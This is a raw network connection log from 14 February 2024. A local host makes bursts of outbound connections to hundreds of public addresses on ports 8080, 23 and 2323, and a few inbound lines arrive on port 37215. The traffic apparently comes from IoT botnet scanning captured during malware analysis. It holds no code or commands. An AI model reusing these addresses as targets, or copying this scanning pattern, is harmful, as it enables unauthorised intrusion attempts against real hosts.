Feb 14, 2024 09:28:45.379971981 CET	6752	8080	192.168.2.15	62.69.24.9
Feb 14, 2024 09:28:45.379971981 CET	6752	8080	192.168.2.15	94.136.205.132
Feb 14, 2024 09:28:45.379988909 CET	6752	8080	192.168.2.15	94.228.251.155
Feb 14, 2024 09:28:45.379992962 CET	6752	8080	192.168.2.15	94.55.40.161
Feb 14, 2024 09:28:45.380003929 CET	6752	8080	192.168.2.15	85.61.182.135
Feb 14, 2024 09:28:45.380004883 CET	6752	8080	192.168.2.15	95.97.8.12
Feb 14, 2024 09:28:45.380003929 CET	6752	8080	192.168.2.15	62.74.91.127
Feb 14, 2024 09:28:45.380008936 CET	6752	8080	192.168.2.15	94.253.89.119
Feb 14, 2024 09:28:45.380014896 CET	6752	8080	192.168.2.15	31.189.206.81
Feb 14, 2024 09:28:45.380032063 CET	6752	8080	192.168.2.15	85.179.189.16
Feb 14, 2024 09:28:45.380032063 CET	6752	8080	192.168.2.15	94.91.168.228
Feb 14, 2024 09:28:45.380032063 CET	6752	8080	192.168.2.15	31.79.139.121
Feb 14, 2024 09:28:45.380032063 CET	6752	8080	192.168.2.15	94.26.254.100
Feb 14, 2024 09:28:45.380034924 CET	6752	8080	192.168.2.15	62.174.70.104
Feb 14, 2024 09:28:45.380038023 CET	6752	8080	192.168.2.15	94.219.40.108
Feb 14, 2024 09:28:45.380038023 CET	6752	8080	192.168.2.15	95.117.75.86
Feb 14, 2024 09:28:45.380038023 CET	6752	8080	192.168.2.15	94.149.48.14
Feb 14, 2024 09:28:45.380042076 CET	6752	8080	192.168.2.15	85.1.225.231
Feb 14, 2024 09:28:45.380047083 CET	6752	8080	192.168.2.15	95.84.187.177
Feb 14, 2024 09:28:45.380048037 CET	37215	8096	197.9.143.103	192.168.2.15
Feb 14, 2024 09:28:45.380055904 CET	6752	8080	192.168.2.15	31.135.101.72
Feb 14, 2024 09:28:45.380065918 CET	6752	8080	192.168.2.15	31.37.170.53
Feb 14, 2024 09:28:45.380065918 CET	6752	8080	192.168.2.15	94.152.8.193
Feb 14, 2024 09:28:45.380073071 CET	6752	8080	192.168.2.15	85.128.214.117
Feb 14, 2024 09:28:45.380074978 CET	6752	8080	192.168.2.15	31.238.53.39
Feb 14, 2024 09:28:45.380085945 CET	6752	8080	192.168.2.15	94.160.41.193
Feb 14, 2024 09:28:45.380089045 CET	6752	8080	192.168.2.15	94.244.108.43
Feb 14, 2024 09:28:45.380089998 CET	6752	8080	192.168.2.15	85.90.137.82
Feb 14, 2024 09:28:45.380100965 CET	6752	8080	192.168.2.15	95.216.229.165
Feb 14, 2024 09:28:45.380114079 CET	6752	8080	192.168.2.15	31.161.200.71
Feb 14, 2024 09:28:45.380114079 CET	6752	8080	192.168.2.15	85.100.49.42
Feb 14, 2024 09:28:45.380120039 CET	6752	8080	192.168.2.15	31.171.89.150
Feb 14, 2024 09:28:45.380120039 CET	6752	8080	192.168.2.15	31.16.159.102
Feb 14, 2024 09:28:45.380125999 CET	6752	8080	192.168.2.15	95.107.75.247
Feb 14, 2024 09:28:45.380125999 CET	6752	8080	192.168.2.15	85.42.62.77
Feb 14, 2024 09:28:45.380125999 CET	6752	8080	192.168.2.15	94.174.193.203
Feb 14, 2024 09:28:45.380129099 CET	6752	8080	192.168.2.15	94.174.176.103
Feb 14, 2024 09:28:45.380148888 CET	6752	8080	192.168.2.15	31.71.158.5
Feb 14, 2024 09:28:45.380148888 CET	6752	8080	192.168.2.15	31.156.58.221
Feb 14, 2024 09:28:45.380150080 CET	6752	8080	192.168.2.15	94.79.41.166
Feb 14, 2024 09:28:45.380153894 CET	6752	8080	192.168.2.15	31.38.168.92
Feb 14, 2024 09:28:45.380161047 CET	6752	8080	192.168.2.15	95.122.199.228
Feb 14, 2024 09:28:45.380163908 CET	6752	8080	192.168.2.15	62.80.219.111
Feb 14, 2024 09:28:45.380179882 CET	6752	8080	192.168.2.15	62.169.113.97
Feb 14, 2024 09:28:45.380181074 CET	6752	8080	192.168.2.15	94.71.135.136
Feb 14, 2024 09:28:45.380181074 CET	6752	8080	192.168.2.15	62.63.220.65
Feb 14, 2024 09:28:45.380181074 CET	6752	8080	192.168.2.15	31.232.176.144
Feb 14, 2024 09:28:45.380181074 CET	6752	8080	192.168.2.15	85.154.181.159
Feb 14, 2024 09:28:45.380193949 CET	6752	8080	192.168.2.15	62.48.132.213
Feb 14, 2024 09:28:45.380197048 CET	6752	8080	192.168.2.15	85.95.34.107
Feb 14, 2024 09:28:45.380214930 CET	6752	8080	192.168.2.15	95.107.217.89
Feb 14, 2024 09:28:45.380214930 CET	6752	8080	192.168.2.15	31.96.144.3
Feb 14, 2024 09:28:45.380217075 CET	6752	8080	192.168.2.15	31.56.118.47
Feb 14, 2024 09:28:45.380223036 CET	6752	8080	192.168.2.15	95.220.203.147
Feb 14, 2024 09:28:45.380234003 CET	6752	8080	192.168.2.15	31.189.89.213
Feb 14, 2024 09:28:45.380237103 CET	6752	8080	192.168.2.15	62.41.218.213
Feb 14, 2024 09:28:45.380237103 CET	6752	8080	192.168.2.15	31.207.249.212
Feb 14, 2024 09:28:45.380263090 CET	6752	8080	192.168.2.15	85.221.78.196
Feb 14, 2024 09:28:45.380265951 CET	6752	8080	192.168.2.15	94.209.52.130
Feb 14, 2024 09:28:45.380266905 CET	6752	8080	192.168.2.15	85.214.233.89
Feb 14, 2024 09:28:45.380270958 CET	6752	8080	192.168.2.15	94.99.2.100
Feb 14, 2024 09:28:45.380270958 CET	6752	8080	192.168.2.15	31.97.201.109
Feb 14, 2024 09:28:45.380273104 CET	6752	8080	192.168.2.15	85.156.74.227
Feb 14, 2024 09:28:45.380273104 CET	6752	8080	192.168.2.15	31.193.226.62
Feb 14, 2024 09:28:45.380273104 CET	6752	8080	192.168.2.15	95.141.123.121
Feb 14, 2024 09:28:45.380273104 CET	6752	8080	192.168.2.15	94.161.3.226
Feb 14, 2024 09:28:45.380273104 CET	6752	8080	192.168.2.15	85.190.168.6
Feb 14, 2024 09:28:45.380279064 CET	6752	8080	192.168.2.15	31.113.202.104
Feb 14, 2024 09:28:45.380281925 CET	6752	8080	192.168.2.15	95.111.109.174
Feb 14, 2024 09:28:45.380286932 CET	6752	8080	192.168.2.15	62.233.182.226
Feb 14, 2024 09:28:45.380295992 CET	6752	8080	192.168.2.15	85.168.1.254
Feb 14, 2024 09:28:45.380295992 CET	6752	8080	192.168.2.15	94.49.35.52
Feb 14, 2024 09:28:45.380309105 CET	6752	8080	192.168.2.15	85.100.221.19
Feb 14, 2024 09:28:45.380317926 CET	6752	8080	192.168.2.15	95.189.192.42
Feb 14, 2024 09:28:45.380317926 CET	6752	8080	192.168.2.15	85.96.92.43
Feb 14, 2024 09:28:45.380332947 CET	6752	8080	192.168.2.15	85.123.70.246
Feb 14, 2024 09:28:45.380345106 CET	6752	8080	192.168.2.15	62.152.231.150
Feb 14, 2024 09:28:45.380345106 CET	6752	8080	192.168.2.15	31.196.83.82
Feb 14, 2024 09:28:45.380347967 CET	6752	8080	192.168.2.15	94.166.188.232
Feb 14, 2024 09:28:45.380347967 CET	6752	8080	192.168.2.15	31.139.88.89
Feb 14, 2024 09:28:45.380351067 CET	6752	8080	192.168.2.15	94.195.251.205
Feb 14, 2024 09:28:45.380351067 CET	6752	8080	192.168.2.15	95.87.220.39
Feb 14, 2024 09:28:45.380362034 CET	6752	8080	192.168.2.15	85.13.241.109
Feb 14, 2024 09:28:45.380382061 CET	6752	8080	192.168.2.15	62.137.39.228
Feb 14, 2024 09:28:45.380383968 CET	6752	8080	192.168.2.15	94.25.5.136
Feb 14, 2024 09:28:45.380383968 CET	6752	8080	192.168.2.15	31.82.1.81
Feb 14, 2024 09:28:45.380384922 CET	6752	8080	192.168.2.15	62.213.247.175
Feb 14, 2024 09:28:45.380383968 CET	6752	8080	192.168.2.15	85.142.176.56
Feb 14, 2024 09:28:45.380384922 CET	6752	8080	192.168.2.15	95.210.59.42
Feb 14, 2024 09:28:45.380384922 CET	6752	8080	192.168.2.15	62.160.42.24
Feb 14, 2024 09:28:45.380390882 CET	6752	8080	192.168.2.15	85.232.50.23
Feb 14, 2024 09:28:45.380393982 CET	6752	8080	192.168.2.15	94.39.160.51
Feb 14, 2024 09:28:45.380405903 CET	6752	8080	192.168.2.15	94.76.140.93
Feb 14, 2024 09:28:45.380408049 CET	6752	8080	192.168.2.15	31.59.163.71
Feb 14, 2024 09:28:45.380409002 CET	6752	8080	192.168.2.15	31.197.230.184
Feb 14, 2024 09:28:45.380410910 CET	6752	8080	192.168.2.15	94.68.10.232
Feb 14, 2024 09:28:45.380417109 CET	6752	8080	192.168.2.15	85.43.171.118
Feb 14, 2024 09:28:45.380417109 CET	6752	8080	192.168.2.15	85.178.235.1
Feb 14, 2024 09:28:45.380426884 CET	6752	8080	192.168.2.15	94.219.109.216
Feb 14, 2024 09:28:45.380426884 CET	6752	8080	192.168.2.15	31.141.121.154
Feb 14, 2024 09:28:45.380429983 CET	6752	8080	192.168.2.15	85.14.151.70
Feb 14, 2024 09:28:45.380429983 CET	6752	8080	192.168.2.15	95.61.131.119
Feb 14, 2024 09:28:45.380429983 CET	6752	8080	192.168.2.15	62.76.113.41
Feb 14, 2024 09:28:45.380438089 CET	6752	8080	192.168.2.15	85.80.196.43
Feb 14, 2024 09:28:45.380435944 CET	6752	8080	192.168.2.15	62.48.198.26
Feb 14, 2024 09:28:45.380434036 CET	6752	8080	192.168.2.15	62.117.236.13
Feb 14, 2024 09:28:45.380435944 CET	6752	8080	192.168.2.15	95.73.161.222
Feb 14, 2024 09:28:45.380434036 CET	6752	8080	192.168.2.15	62.24.206.83
Feb 14, 2024 09:28:45.380434036 CET	6752	8080	192.168.2.15	31.221.6.167
Feb 14, 2024 09:28:45.380445004 CET	6752	8080	192.168.2.15	62.88.77.115
Feb 14, 2024 09:28:45.380450964 CET	6752	8080	192.168.2.15	62.238.117.145
Feb 14, 2024 09:28:45.380455017 CET	6752	8080	192.168.2.15	62.94.64.159
Feb 14, 2024 09:28:45.380465984 CET	6752	8080	192.168.2.15	95.128.30.122
Feb 14, 2024 09:28:45.380465984 CET	6752	8080	192.168.2.15	85.97.143.99
Feb 14, 2024 09:28:45.380469084 CET	6752	8080	192.168.2.15	62.18.204.111
Feb 14, 2024 09:28:45.380470991 CET	6752	8080	192.168.2.15	85.70.86.137
Feb 14, 2024 09:28:45.380470991 CET	6752	8080	192.168.2.15	62.107.144.8
Feb 14, 2024 09:28:45.380470991 CET	6752	8080	192.168.2.15	31.181.50.163
Feb 14, 2024 09:28:45.380471945 CET	6752	8080	192.168.2.15	62.14.146.95
Feb 14, 2024 09:28:45.380470991 CET	6752	8080	192.168.2.15	31.181.229.225
Feb 14, 2024 09:28:45.380471945 CET	6752	8080	192.168.2.15	94.201.98.96
Feb 14, 2024 09:28:45.380482912 CET	6752	8080	192.168.2.15	62.160.54.131
Feb 14, 2024 09:28:45.380494118 CET	6752	8080	192.168.2.15	94.25.110.26
Feb 14, 2024 09:28:45.380498886 CET	6752	8080	192.168.2.15	85.79.62.211
Feb 14, 2024 09:28:45.380502939 CET	6752	8080	192.168.2.15	31.171.205.3
Feb 14, 2024 09:28:45.380508900 CET	6752	8080	192.168.2.15	94.110.175.20
Feb 14, 2024 09:28:45.380508900 CET	6752	8080	192.168.2.15	95.218.230.255
Feb 14, 2024 09:28:45.380511999 CET	6752	8080	192.168.2.15	31.189.181.72
Feb 14, 2024 09:28:45.380526066 CET	6752	8080	192.168.2.15	62.63.67.44
Feb 14, 2024 09:28:45.380528927 CET	6752	8080	192.168.2.15	62.182.140.51
Feb 14, 2024 09:28:45.380532980 CET	6752	8080	192.168.2.15	94.8.154.48
Feb 14, 2024 09:28:45.380553007 CET	6752	8080	192.168.2.15	95.82.54.188
Feb 14, 2024 09:28:45.380558014 CET	6752	8080	192.168.2.15	62.63.74.235
Feb 14, 2024 09:28:45.380558968 CET	6752	8080	192.168.2.15	31.162.221.223
Feb 14, 2024 09:28:45.380558968 CET	6752	8080	192.168.2.15	85.253.233.255
Feb 14, 2024 09:28:45.380558014 CET	6752	8080	192.168.2.15	31.138.207.168
Feb 14, 2024 09:28:45.380563021 CET	6752	8080	192.168.2.15	62.167.6.173
Feb 14, 2024 09:28:45.380580902 CET	6752	8080	192.168.2.15	31.190.26.1
Feb 14, 2024 09:28:45.380595922 CET	6752	8080	192.168.2.15	85.251.231.165
Feb 14, 2024 09:28:45.380598068 CET	6752	8080	192.168.2.15	94.19.51.134
Feb 14, 2024 09:28:45.380599976 CET	6752	8080	192.168.2.15	62.189.83.14
Feb 14, 2024 09:28:45.380599976 CET	6752	8080	192.168.2.15	31.138.8.249
Feb 14, 2024 09:28:45.380624056 CET	6752	8080	192.168.2.15	62.255.200.6
Feb 14, 2024 09:28:45.380624056 CET	6752	8080	192.168.2.15	62.56.158.4
Feb 14, 2024 09:28:45.380624056 CET	6752	8080	192.168.2.15	31.147.138.169
Feb 14, 2024 09:28:45.380624056 CET	6752	8080	192.168.2.15	31.223.9.111
Feb 14, 2024 09:28:45.380624056 CET	6752	8080	192.168.2.15	94.237.210.174
Feb 14, 2024 09:28:45.380624056 CET	6752	8080	192.168.2.15	85.185.98.175
Feb 14, 2024 09:28:45.380625010 CET	6752	8080	192.168.2.15	94.57.235.178
Feb 14, 2024 09:28:45.380626917 CET	6752	8080	192.168.2.15	94.243.115.249
Feb 14, 2024 09:28:45.380625010 CET	6752	8080	192.168.2.15	95.13.48.52
Feb 14, 2024 09:28:45.380630016 CET	6752	8080	192.168.2.15	62.186.255.225
Feb 14, 2024 09:28:45.380630016 CET	6752	8080	192.168.2.15	94.214.12.167
Feb 14, 2024 09:28:45.380635977 CET	6752	8080	192.168.2.15	31.86.126.87
Feb 14, 2024 09:28:45.380640984 CET	6752	8080	192.168.2.15	94.57.210.158
Feb 14, 2024 09:28:45.380640984 CET	6752	8080	192.168.2.15	31.16.200.1
Feb 14, 2024 09:28:45.380650043 CET	6752	8080	192.168.2.15	62.61.34.215
Feb 14, 2024 09:28:45.380661964 CET	6752	8080	192.168.2.15	85.236.178.146
Feb 14, 2024 09:28:45.380661964 CET	6752	8080	192.168.2.15	85.77.165.184
Feb 14, 2024 09:28:45.380671024 CET	6752	8080	192.168.2.15	62.231.93.148
Feb 14, 2024 09:28:45.380678892 CET	6752	8080	192.168.2.15	95.245.96.165
Feb 14, 2024 09:28:45.380682945 CET	6752	8080	192.168.2.15	94.146.228.255
Feb 14, 2024 09:28:45.380913019 CET	6752	8080	192.168.2.15	62.184.251.249
Feb 14, 2024 09:28:45.383503914 CET	6752	8080	192.168.2.15	94.57.101.53
Feb 14, 2024 09:28:45.403743029 CET	37215	8096	157.55.130.79	192.168.2.15
Feb 14, 2024 09:28:45.423316956 CET	1184	2323	192.168.2.15	69.28.125.18
Feb 14, 2024 09:28:45.423319101 CET	1184	23	192.168.2.15	130.73.54.65
Feb 14, 2024 09:28:45.423326015 CET	1184	23	192.168.2.15	20.145.81.161
Feb 14, 2024 09:28:45.423326969 CET	1184	23	192.168.2.15	174.37.78.133
Feb 14, 2024 09:28:45.423362017 CET	1184	23	192.168.2.15	166.60.81.120
Feb 14, 2024 09:28:45.423366070 CET	1184	2323	192.168.2.15	85.211.216.44
Feb 14, 2024 09:28:45.423366070 CET	1184	23	192.168.2.15	87.62.249.27
Feb 14, 2024 09:28:45.423366070 CET	1184	23	192.168.2.15	216.204.24.0
Feb 14, 2024 09:28:45.423369884 CET	1184	23	192.168.2.15	176.251.218.64
Feb 14, 2024 09:28:45.423369884 CET	1184	23	192.168.2.15	134.148.214.187
Feb 14, 2024 09:28:45.423378944 CET	1184	23	192.168.2.15	185.65.0.142
Feb 14, 2024 09:28:45.423381090 CET	1184	23	192.168.2.15	211.158.174.43
Feb 14, 2024 09:28:45.423382998 CET	1184	23	192.168.2.15	12.16.22.21
Feb 14, 2024 09:28:45.423387051 CET	1184	23	192.168.2.15	46.126.176.202
Feb 14, 2024 09:28:45.423389912 CET	1184	23	192.168.2.15	129.57.199.93
Feb 14, 2024 09:28:45.423387051 CET	1184	23	192.168.2.15	141.0.19.39
Feb 14, 2024 09:28:45.423397064 CET	1184	23	192.168.2.15	218.243.51.169
Feb 14, 2024 09:28:45.423403025 CET	1184	23	192.168.2.15	221.183.87.221
Feb 14, 2024 09:28:45.423403025 CET	1184	23	192.168.2.15	151.168.218.198
Feb 14, 2024 09:28:45.423419952 CET	1184	23	192.168.2.15	37.116.41.129
Feb 14, 2024 09:28:45.423419952 CET	1184	2323	192.168.2.15	181.160.243.153
Feb 14, 2024 09:28:45.423423052 CET	1184	23	192.168.2.15	152.158.254.58
Feb 14, 2024 09:28:45.423423052 CET	1184	23	192.168.2.15	66.117.82.162
Feb 14, 2024 09:28:45.423428059 CET	1184	23	192.168.2.15	69.130.180.137
Feb 14, 2024 09:28:45.423435926 CET	1184	23	192.168.2.15	221.57.11.149
Feb 14, 2024 09:28:45.423435926 CET	1184	23	192.168.2.15	192.90.135.195
Feb 14, 2024 09:28:45.423437119 CET	1184	23	192.168.2.15	97.93.77.148
Feb 14, 2024 09:28:45.423438072 CET	1184	2323	192.168.2.15	208.71.176.70
Feb 14, 2024 09:28:45.423434973 CET	1184	23	192.168.2.15	110.242.29.17
Feb 14, 2024 09:28:45.423434973 CET	1184	23	192.168.2.15	205.114.43.235
Feb 14, 2024 09:28:45.423434973 CET	1184	23	192.168.2.15	108.34.188.182
Feb 14, 2024 09:28:45.423455000 CET	1184	23	192.168.2.15	86.250.129.111
Feb 14, 2024 09:28:45.423455954 CET	1184	23	192.168.2.15	76.106.115.214
Feb 14, 2024 09:28:45.423455954 CET	1184	23	192.168.2.15	178.196.137.125
Feb 14, 2024 09:28:45.423463106 CET	1184	23	192.168.2.15	212.48.43.169
Feb 14, 2024 09:28:45.423464060 CET	1184	23	192.168.2.15	77.141.53.81
Feb 14, 2024 09:28:45.423477888 CET	1184	23	192.168.2.15	5.158.145.127
Feb 14, 2024 09:28:45.423484087 CET	1184	23	192.168.2.15	147.70.130.223
Feb 14, 2024 09:28:45.423485041 CET	1184	2323	192.168.2.15	86.172.154.180
Feb 14, 2024 09:28:45.423491955 CET	1184	23	192.168.2.15	105.156.196.234
Feb 14, 2024 09:28:45.423507929 CET	1184	23	192.168.2.15	106.4.144.32
Feb 14, 2024 09:28:45.423508883 CET	1184	23	192.168.2.15	49.95.182.235
Feb 14, 2024 09:28:45.423508883 CET	1184	23	192.168.2.15	173.98.31.68
Feb 14, 2024 09:28:45.423508883 CET	1184	23	192.168.2.15	76.38.177.226
Feb 14, 2024 09:28:45.423511028 CET	1184	23	192.168.2.15	146.224.145.45
Feb 14, 2024 09:28:45.423518896 CET	1184	23	192.168.2.15	59.237.239.126
Feb 14, 2024 09:28:45.423518896 CET	1184	23	192.168.2.15	97.198.170.99
Feb 14, 2024 09:28:45.423527002 CET	1184	2323	192.168.2.15	208.237.214.129
Feb 14, 2024 09:28:45.423533916 CET	1184	23	192.168.2.15	138.178.57.65
Feb 14, 2024 09:28:45.423533916 CET	1184	23	192.168.2.15	210.249.104.184
Feb 14, 2024 09:28:45.423536062 CET	1184	23	192.168.2.15	141.156.182.100
Feb 14, 2024 09:28:45.423537016 CET	1184	23	192.168.2.15	155.27.121.107
Feb 14, 2024 09:28:45.423541069 CET	1184	23	192.168.2.15	19.190.184.90
Feb 14, 2024 09:28:45.423542976 CET	1184	23	192.168.2.15	198.41.41.39
Feb 14, 2024 09:28:45.423557043 CET	1184	23	192.168.2.15	90.131.116.48
Feb 14, 2024 09:28:45.423557043 CET	1184	23	192.168.2.15	160.255.219.16
Feb 14, 2024 09:28:45.423557997 CET	1184	23	192.168.2.15	79.162.103.127
Feb 14, 2024 09:28:45.423558950 CET	1184	23	192.168.2.15	161.74.222.190
Feb 14, 2024 09:28:45.423558950 CET	1184	23	192.168.2.15	68.99.210.183
Feb 14, 2024 09:28:45.423558950 CET	1184	23	192.168.2.15	66.179.11.43
Feb 14, 2024 09:28:45.423559904 CET	1184	2323	192.168.2.15	45.155.158.180
Feb 14, 2024 09:28:45.423568010 CET	1184	23	192.168.2.15	121.55.247.114
Feb 14, 2024 09:28:45.423609972 CET	1184	23	192.168.2.15	72.132.142.125
Feb 14, 2024 09:28:45.423609972 CET	1184	23	192.168.2.15	4.41.72.26
Feb 14, 2024 09:28:45.423609972 CET	1184	23	192.168.2.15	98.76.106.34
Feb 14, 2024 09:28:45.423609972 CET	1184	23	192.168.2.15	208.205.136.10
Feb 14, 2024 09:28:45.423634052 CET	1184	23	192.168.2.15	45.41.46.243
Feb 14, 2024 09:28:45.423634052 CET	1184	23	192.168.2.15	66.174.34.10
Feb 14, 2024 09:28:45.423634052 CET	1184	23	192.168.2.15	66.221.220.161
Feb 14, 2024 09:28:45.423634052 CET	1184	23	192.168.2.15	136.154.32.230
Feb 14, 2024 09:28:45.423641920 CET	1184	2323	192.168.2.15	199.160.66.15
Feb 14, 2024 09:28:45.423643112 CET	1184	23	192.168.2.15	39.188.99.105
Feb 14, 2024 09:28:45.423643112 CET	1184	23	192.168.2.15	97.215.90.243
Feb 14, 2024 09:28:45.423645973 CET	1184	23	192.168.2.15	41.108.141.141
Feb 14, 2024 09:28:45.423645973 CET	1184	23	192.168.2.15	27.142.176.213
Feb 14, 2024 09:28:45.423646927 CET	1184	23	192.168.2.15	122.98.186.176
Feb 14, 2024 09:28:45.423648119 CET	1184	23	192.168.2.15	59.96.209.144
Feb 14, 2024 09:28:45.423646927 CET	1184	23	192.168.2.15	140.88.93.142
Feb 14, 2024 09:28:45.423650026 CET	1184	23	192.168.2.15	198.110.234.129
Feb 14, 2024 09:28:45.423650026 CET	1184	23	192.168.2.15	136.193.10.137
Feb 14, 2024 09:28:45.423650026 CET	1184	2323	192.168.2.15	149.237.227.40
Feb 14, 2024 09:28:45.423646927 CET	1184	23	192.168.2.15	20.37.134.200
Feb 14, 2024 09:28:45.423650026 CET	1184	23	192.168.2.15	168.224.146.120
Feb 14, 2024 09:28:45.423646927 CET	1184	23	192.168.2.15	184.173.233.21
Feb 14, 2024 09:28:45.423650980 CET	1184	23	192.168.2.15	193.48.195.198
Feb 14, 2024 09:28:45.423650026 CET	1184	2323	192.168.2.15	94.129.26.59
Feb 14, 2024 09:28:45.423650026 CET	1184	23	192.168.2.15	5.219.196.145
Feb 14, 2024 09:28:45.423667908 CET	1184	23	192.168.2.15	125.167.118.244
Feb 14, 2024 09:28:45.423667908 CET	1184	23	192.168.2.15	41.58.65.65
Feb 14, 2024 09:28:45.423667908 CET	1184	2323	192.168.2.15	181.160.162.152
Feb 14, 2024 09:28:45.423674107 CET	1184	23	192.168.2.15	97.156.22.25
Feb 14, 2024 09:28:45.423675060 CET	1184	23	192.168.2.15	175.5.28.163
Feb 14, 2024 09:28:45.423674107 CET	1184	23	192.168.2.15	95.249.206.29
Feb 14, 2024 09:28:45.423675060 CET	1184	23	192.168.2.15	195.46.196.207
Feb 14, 2024 09:28:45.423675060 CET	1184	23	192.168.2.15	166.123.137.248
Feb 14, 2024 09:28:45.423677921 CET	1184	23	192.168.2.15	167.251.3.158
Feb 14, 2024 09:28:45.423675060 CET	1184	23	192.168.2.15	72.110.227.226
Feb 14, 2024 09:28:45.423675060 CET	1184	23	192.168.2.15	32.16.66.58
Feb 14, 2024 09:28:45.423675060 CET	1184	23	192.168.2.15	62.178.87.21
Feb 14, 2024 09:28:45.423675060 CET	1184	23	192.168.2.15	211.12.176.208
Feb 14, 2024 09:28:45.423675060 CET	1184	23	192.168.2.15	135.103.72.153
Feb 14, 2024 09:28:45.423677921 CET	1184	23	192.168.2.15	49.50.128.191
Feb 14, 2024 09:28:45.423677921 CET	1184	23	192.168.2.15	168.95.127.109
Feb 14, 2024 09:28:45.423677921 CET	1184	23	192.168.2.15	182.186.171.69
Feb 14, 2024 09:28:45.423677921 CET	1184	23	192.168.2.15	69.138.88.224
Feb 14, 2024 09:28:45.423677921 CET	1184	23	192.168.2.15	142.239.140.103
Feb 14, 2024 09:28:45.423677921 CET	1184	23	192.168.2.15	203.245.64.16
Feb 14, 2024 09:28:45.423690081 CET	1184	23	192.168.2.15	191.77.58.96
Feb 14, 2024 09:28:45.423690081 CET	1184	23	192.168.2.15	49.205.37.186
Feb 14, 2024 09:28:45.423690081 CET	1184	23	192.168.2.15	32.153.210.60
Feb 14, 2024 09:28:45.423690081 CET	1184	23	192.168.2.15	211.121.42.1
Feb 14, 2024 09:28:45.423690081 CET	1184	2323	192.168.2.15	60.128.159.123
Feb 14, 2024 09:28:45.423690081 CET	1184	23	192.168.2.15	71.44.21.186
Feb 14, 2024 09:28:45.423690081 CET	1184	23	192.168.2.15	125.155.99.9
Feb 14, 2024 09:28:45.423693895 CET	1184	23	192.168.2.15	113.82.227.202
Feb 14, 2024 09:28:45.423693895 CET	1184	2323	192.168.2.15	119.221.72.123
Feb 14, 2024 09:28:45.423693895 CET	1184	23	192.168.2.15	65.91.71.170
Feb 14, 2024 09:28:45.423696995 CET	1184	23	192.168.2.15	93.242.141.17
Feb 14, 2024 09:28:45.423696995 CET	1184	23	192.168.2.15	117.237.105.144
Feb 14, 2024 09:28:45.423696995 CET	1184	23	192.168.2.15	32.139.131.237
Feb 14, 2024 09:28:45.423700094 CET	1184	23	192.168.2.15	123.219.71.179
Feb 14, 2024 09:28:45.423700094 CET	1184	23	192.168.2.15	90.229.209.3
Feb 14, 2024 09:28:45.423700094 CET	1184	23	192.168.2.15	186.208.157.204
Feb 14, 2024 09:28:45.423700094 CET	1184	23	192.168.2.15	24.254.48.140
Feb 14, 2024 09:28:45.423700094 CET	1184	23	192.168.2.15	107.28.184.25
Feb 14, 2024 09:28:45.423742056 CET	1184	23	192.168.2.15	4.212.90.222
Feb 14, 2024 09:28:45.423742056 CET	1184	23	192.168.2.15	135.85.14.11
Feb 14, 2024 09:28:45.423742056 CET	1184	23	192.168.2.15	122.180.209.193
Feb 14, 2024 09:28:45.423742056 CET	1184	23	192.168.2.15	60.144.212.91
Feb 14, 2024 09:28:45.423742056 CET	1184	23	192.168.2.15	51.209.233.191
Feb 14, 2024 09:28:45.423757076 CET	1184	23	192.168.2.15	143.227.231.46
Feb 14, 2024 09:28:45.423763990 CET	1184	23	192.168.2.15	172.156.16.101
Feb 14, 2024 09:28:45.423768044 CET	1184	23	192.168.2.15	87.244.164.71
Feb 14, 2024 09:28:45.423768044 CET	1184	2323	192.168.2.15	106.210.248.155
Feb 14, 2024 09:28:45.423773050 CET	1184	2323	192.168.2.15	122.7.69.177
Feb 14, 2024 09:28:45.423788071 CET	1184	23	192.168.2.15	108.8.139.156
Feb 14, 2024 09:28:45.423788071 CET	1184	23	192.168.2.15	40.173.141.30
Feb 14, 2024 09:28:45.423788071 CET	1184	23	192.168.2.15	67.86.66.62
Feb 14, 2024 09:28:45.423790932 CET	1184	23	192.168.2.15	206.62.19.89
Feb 14, 2024 09:28:45.423790932 CET	1184	23	192.168.2.15	91.166.191.165
Feb 14, 2024 09:28:45.423790932 CET	1184	23	192.168.2.15	118.190.154.123
Feb 14, 2024 09:28:45.423790932 CET	1184	23	192.168.2.15	111.111.108.201
Feb 14, 2024 09:28:45.423790932 CET	1184	23	192.168.2.15	17.60.204.124
Feb 14, 2024 09:28:45.423790932 CET	1184	23	192.168.2.15	125.229.45.223
Feb 14, 2024 09:28:45.423799038 CET	1184	23	192.168.2.15	51.161.235.60
Feb 14, 2024 09:28:45.423799992 CET	1184	23	192.168.2.15	149.192.227.97
Feb 14, 2024 09:28:45.423799992 CET	1184	23	192.168.2.15	177.240.251.217
Feb 14, 2024 09:28:45.423818111 CET	1184	2323	192.168.2.15	98.195.63.204
Feb 14, 2024 09:28:45.423830032 CET	1184	23	192.168.2.15	200.40.116.142
Feb 14, 2024 09:28:45.423830032 CET	1184	23	192.168.2.15	180.3.96.11
Feb 14, 2024 09:28:45.423835993 CET	1184	23	192.168.2.15	210.135.211.8
Feb 14, 2024 09:28:45.423846960 CET	1184	23	192.168.2.15	78.185.190.107
Feb 14, 2024 09:28:45.423861027 CET	1184	23	192.168.2.15	193.101.70.95
Feb 14, 2024 09:28:45.423861980 CET	1184	23	192.168.2.15	83.215.2.10
Feb 14, 2024 09:28:45.423861980 CET	1184	2323	192.168.2.15	222.110.6.148
Feb 14, 2024 09:28:45.423862934 CET	1184	23	192.168.2.15	173.180.247.19
Feb 14, 2024 09:28:45.423862934 CET	1184	23	192.168.2.15	142.110.65.122
Feb 14, 2024 09:28:45.423862934 CET	1184	23	192.168.2.15	142.140.110.114
Feb 14, 2024 09:28:45.423862934 CET	1184	23	192.168.2.15	169.7.201.179
Feb 14, 2024 09:28:45.423862934 CET	1184	23	192.168.2.15	178.90.213.48
Feb 14, 2024 09:28:45.423862934 CET	1184	23	192.168.2.15	119.244.172.174
Feb 14, 2024 09:28:45.423862934 CET	1184	23	192.168.2.15	202.60.180.111
Feb 14, 2024 09:28:45.423866987 CET	1184	23	192.168.2.15	173.69.74.15
Feb 14, 2024 09:28:45.423871994 CET	1184	23	192.168.2.15	184.109.75.37
Feb 14, 2024 09:28:45.423877954 CET	1184	23	192.168.2.15	174.239.201.3
Feb 14, 2024 09:28:45.423877954 CET	1184	23	192.168.2.15	134.245.242.37
Feb 14, 2024 09:28:45.423880100 CET	1184	23	192.168.2.15	163.93.204.91
Feb 14, 2024 09:28:45.423880100 CET	1184	23	192.168.2.15	179.221.4.226
Feb 14, 2024 09:28:45.423903942 CET	1184	23	192.168.2.15	66.30.65.71
Feb 14, 2024 09:28:45.423903942 CET	1184	23	192.168.2.15	173.118.70.101
Feb 14, 2024 09:28:45.423909903 CET	1184	23	192.168.2.15	129.199.38.204
